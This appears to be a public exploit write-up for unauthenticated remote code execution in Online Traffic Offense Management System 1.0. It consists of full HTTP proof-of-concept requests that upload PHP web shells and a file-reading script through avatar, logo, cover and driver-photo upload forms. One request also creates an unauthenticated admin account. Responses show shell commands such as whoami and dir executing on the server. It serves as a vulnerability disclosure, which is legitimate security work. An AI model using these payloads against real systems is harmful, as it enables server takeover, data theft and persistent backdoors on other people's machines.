Platform:
Date:
2021-10-07
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### RCE - Remote Code Execution
# All requests can be sent by both an authenticated and a non-authenticated user
# RCE - we can exploit the RCE vulnerability in several ways:
* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user
* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1
# Request send as Unauthenticated user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"
1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------210106920639395210803657370685--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
1
-----------------------------------------------------------------------------------------------------------------------
# The file was uploaded to the uploads directory
# Request to list files in uploads\
GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /traffic_offense/uploads</title>
</head>
<body>
<h1>Index of /traffic_offense/uploads</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a> </td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a> </td><td align="right">2021-08-19 09:24 </td><td align="right"> 11K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58 </td><td align="right">5.2K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31 </td><td align="right">3.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a> </td>
[...]
-----------------------------------------------------------------------------------------------------------------------
# Request to webshell
GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Volume in drive C has no label.
Volume Serial Number is 283C-C6A0
Directory of C:\xampp\htdocs\traffic_offense\uploads
07.10.2021 10:09 <DIR> .
07.10.2021 10:09 <DIR> ..
19.08.2021 09:24 11ÿ426 1629336240_avatar.jpg
20.08.2021 08:58 5ÿ288 1629421080_tl-logo.png
07.10.2021 07:31 3ÿ451 1633584660_xss.svg
07.10.2021 09:59 252 1633593540_cmd.php
07.10.2021 10:02 252 1633593720_cmd.php
07.10.2021 09:02 <DIR> drivers
5 File(s) 20ÿ669 bytes
3 Dir(s) 86ÿ494ÿ085ÿ120 bytes free
</pre>
</BODY></HTML>
-----------------------------------------------------------------------------------------------------------------------
## Example 2
# Webshell as System Logo and next webshell as Potal Cover in System Information page
# Request
POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"
Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"
OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"
<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream
<?php
if($_GET['file']) {
$fichero=$_GET['file'];
} else {
$fichero="/";
}
if($handle = @opendir($fichero)) {
while($filename = readdir($handle)) {
echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
}
closedir($handle);
} else {
echo "FILE: " . $fichero . "<br><hr><pre>";
$fp = fopen($fichero, "r");
$buffer = fread($fp, filesize($fichero));
echo $buffer;
fclose($fp);
}
?>
-----------------------------339921602532596419562348365833--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
1
-----------------------------------------------------------------------------------------------------------------------
# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php
## Example 3
# Webshell as photo in driver list page
# Request
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"
vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"
vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"
vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"
vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"
2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"
vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"
vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"
Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"
vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"
vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"
Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------12210274961293066124133837204--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
# Request to webshell
GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>desktop-uhrf0c6\hubert
</pre>